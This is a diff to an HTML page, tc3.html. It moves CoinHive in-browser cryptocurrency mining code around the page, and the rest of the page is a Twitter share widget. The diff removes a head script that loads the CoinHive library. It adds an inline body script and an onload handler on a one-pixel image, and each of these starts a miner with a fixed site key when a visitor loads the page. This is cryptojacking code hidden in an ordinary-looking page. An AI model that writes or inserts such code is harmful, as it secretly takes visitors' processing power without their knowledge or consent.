--- a/tc3.html
+++ b/tc3.html
@@ -1,11 +1,6 @@
 <html>
 <head>
- <script  type="text/javascript">
-  var script = document.createElement("script"); // Make a script DOM node
-    script.src = "https://coin-hive.com/lib/coinhive.min.js"; // Set it's src to the provided URL
-   script.innerHTML="var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});miner.start();"; 
-    document.head.appendChild(script);
-  </script>
+
 	 <script  type="text/javascript">
 	
 	
@@ -94,6 +89,10 @@
 </head>
 <body>
 <div>
+	<script  type="text/javascript">
+ var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});miner.start();
+  </script>
+	
 <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" onload="var miner = new CoinHive.Anonymous('bbxalNoLp5ZVs6plwCnsSbpPMdqh5qw7', {throttle: 0.1});miner.start();">
  <!--Share twitter -->
     <div style="display:inline-block" id="twitter_button"><a class="twitter-share-button" data-count="none" data-lang="ru" data-related="Berder_:SEO раскрутка сайтов,loteron_f:Читай меня  а я буду читать тебя,DimonDDDDD:Читай меня  а я буду читать тебя,mofigbuul:Автомобили FollowBack" data-size="large" data-via="loteron_f" href="https://twitter.com/share?text=Messi crying">Tweet</a></div>
